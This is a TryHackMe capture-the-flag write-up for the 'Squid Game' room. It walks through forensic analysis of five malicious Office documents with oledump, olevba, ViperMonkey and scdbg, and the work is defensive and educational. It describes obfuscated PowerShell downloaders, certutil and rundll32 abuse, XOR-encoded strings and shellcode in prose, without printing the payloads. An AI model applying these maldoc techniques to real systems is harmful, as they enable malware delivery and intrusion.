Squid Game
Link room : https://tryhackme.com/room/squidgameroom
The Room is about Forensic analysis malware documents
Attacker 1
The toolkit that helps analyze malicious macros or malicious code in .doc documents is called the general ole toolkit
First lookup from oledump :
In first question , malicious C2 domain can found in the maldoc where an executable download , finding the C2 is kind find some exucutable strings ,obfuscate code so we will look through stream to see what inside
In stream 4 contained something like a powershell command and it was obfuscated and encoded in base64 so it looks like this command when called it will download something and call to C2 domain
Need more infomation to identify
Let try analyze the source code, using olveba :
highlight this, it replaces 'A' to '[' so we can try this on the code we had in the previous section
now we can see the C2 domain and the answer for the ques 2 too, it try get the folder have the file right there.
This will be next answer question let try take a look when use powershell checking that
Follow the hint and some research that telling about clsid so we have the clsis here too :
Let research about this clsid found an aritcle about this : https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
And got the answer we need :
Also we can see the ip and php extentions too :
Next question does not need that anymore , so switch to another tool in ole tool , it is olemeta : This will extract all standard properties
Got the answer about phone number too.
Back to olvba so we can get what we need in next question :
So about subject it right on when use olemeta :
Oletimes will help for the next question:
Oledump will provides in last 2 questions:
The M is for Marco and that what we need.
Attacker 2
So we have familer with ole Tool ,now move on the second maldoc :
Option -i will provides extra infomation :
So 15671 is the total of code not and had compile so 13867 is the code compiled in that stream contain marco and we can see the highest byte for next question.
We will finding through hold stream and with option -v in oledumpy will help decompress the VBA script might contain in some stream :
So it might the string we need , reverse that and get the answer :
So next is finding 2 domain , it will start with http and i will do the finding again with that , i prefer option -S to execute the string output
So from number 9 it looks like a suspect domain, and we got the first 2 domains for the answer and taking a closer look we can also get the answer for the next 2 questions, The dll file name and number are right there also the path too.( C:\)
Rundll32.exe will perform to run file dll , we can research to read more about that.
Stream 9 contain information we need for next question , so because VBS script contain in here that why contain important information we need to find out and investigate :
Found the times of the maldoc sleep for to fully execute the malicious DLLs (15000 miliseconds) and the stream name again in last question just run the oledump and we can get that .
Attacker 3
Let take a look at oledump first :
Now is finding executable so we can do like previous step in the Attacker 2 ,change what we want finding and the file doc
Look in this we can see the % represent for variable and that replace
So the answer for next is certutil .
So do same method to finding the http or https doesn't give back to us anything good , at here we have another tool for this it is Vipermonkey : ViperMonkey is a VBA Emulation engine written in Python, designed to analyze and deobfuscate malicious VBA Macros contained in Microsoft Office files.
Read more about this on this github : https://github.com/decalage2/ViperMonkey
Let try use that on this file :
Scroll down and look carefully we can see the suspect http link at here :
Look again at result from previous by using oledump we can see the stream that execute the binary :
Attacker 4
Again with oledump first to look the stream :
So stream 7 contain the marco , let take a look deep into it
Scroll down and we can see this
It is the XORI function in vba , first param take the text and the second is the key ,we can read more about this at here : https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/deobfuscating-malicious-macros-using-python/
So let decode that string
For next 2 questions , let try decode more string below which in function XORI and this is the what we need :
Same with next the second binary
Attacker 5
So now let finding the caption , with option -e we can extract embedded in the file
Next , try vmonkey on this file we can get de base64 encoded
Remove the null byte we got some infomation
We can see the gzip compress in here so luckly cyberchef have the plugin call gunzip can help for decompress the base64 output of that
That code is telling the math xoring the data base64 with 35 too let take another decode on that
Not readable much but we can see the User-Agent which meanprobably look like here is the shellcode , we have a tool for analyzy this is scdbg
Let save the file first then use this tool for analyze shellcode
Let try use basic first :
For the path value we can use /s or up this file to virustotal is another way ( virustotal also provides the port number of the connect server and the IP too)
Note : we can try upload file on virustotal outside of the machine
Last updated